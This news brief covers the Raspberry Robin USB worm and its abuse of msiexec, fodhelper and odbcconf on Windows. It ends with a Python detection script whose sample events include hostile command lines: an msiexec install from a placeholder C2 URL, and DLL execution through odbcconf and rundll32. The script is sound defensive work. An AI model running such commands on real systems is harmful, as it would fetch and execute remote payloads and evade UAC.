BleepingComputer reports that various networks, including those of organizations in the technology and manufacturing industries, have been impacted by the novel Raspberry Robin malware, which spreads to Windows systems through infected USB drives.
Raspberry Robin exploits the Microsoft Standard Installer (msiexec.exe) to communicate with command-and-control servers, a report from Red Canary revealed. "While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes," said researchers.
The report added that Raspberry Robin launches a malicious DLL along with the fodhelper and odbcconf utilities, with the former enabling User Account Control evasion and the latter allowing DLL configuration and execution.
However, questions remain about the activity of Raspberry Robin. "First and foremost, we don't know how or where Raspberry Robin infects external drives to perpetuate its activity, though it's likely this occurs offline or otherwise outside of our visibility. We also don't know why Raspberry Robin installs a malicious DLL. One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis," researchers added.
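
The three behaviors described above (msiexec.exe reaching out to a remote host, fodhelper used for UAC evasion, odbcconf used to execute a DLL) can be turned into simple process-creation triage rules. The following is an added example, not code from Red Canary or BleepingComputer; the event field names, rule names and every sample value (domain, paths, DLL name) are constructed assumptions, and the rules are heuristics that need tuning against legitimate installer activity.

```python
import re

# Constructed process-creation events (parent image, image, command line).
# The domain, paths and DLL names are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"parent": "cmd.exe", "image": "msiexec.exe",
     "cmdline": "msiexec /q /i http://c2.example.invalid:8080/token"},
    {"parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": r"msiexec /i C:\Installers\app.msi"},
    {"parent": "fodhelper.exe", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\placeholder.dll,Start"},
    {"parent": "cmd.exe", "image": "odbcconf.exe",
     "cmdline": r"odbcconf.exe /s /a {regsvr C:\Users\Public\placeholder.dll}"},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

URL_RE = re.compile(r"https?://", re.I)   # remote package source on the command line
DLL_RE = re.compile(r"\.dll\b", re.I)     # DLL path passed as an argument


def classify(event):
    """Return the names of the heuristic rules a single event matches."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"]
    hits = []
    # msiexec.exe asked to fetch from a URL: external network communication.
    if image == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("msiexec_remote_url")
    # Anything spawned by fodhelper.exe: possible UAC evasion (assumed heuristic).
    if parent == "fodhelper.exe":
        hits.append("fodhelper_child_process")
    # odbcconf.exe handed a DLL: DLL configuration and execution.
    if image == "odbcconf.exe" and DLL_RE.search(cmd):
        hits.append("odbcconf_dll_load")
    return hits


def triage(events):
    """Map event index -> matched rules, skipping events with no hits."""
    return {i: rules for i, e in enumerate(events) if (rules := classify(e))}


if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], rules)
```

The local `msiexec /i C:\Installers\app.msi` event is deliberately left unflagged: only the remote-URL form matches, which keeps ordinary installs out of the results.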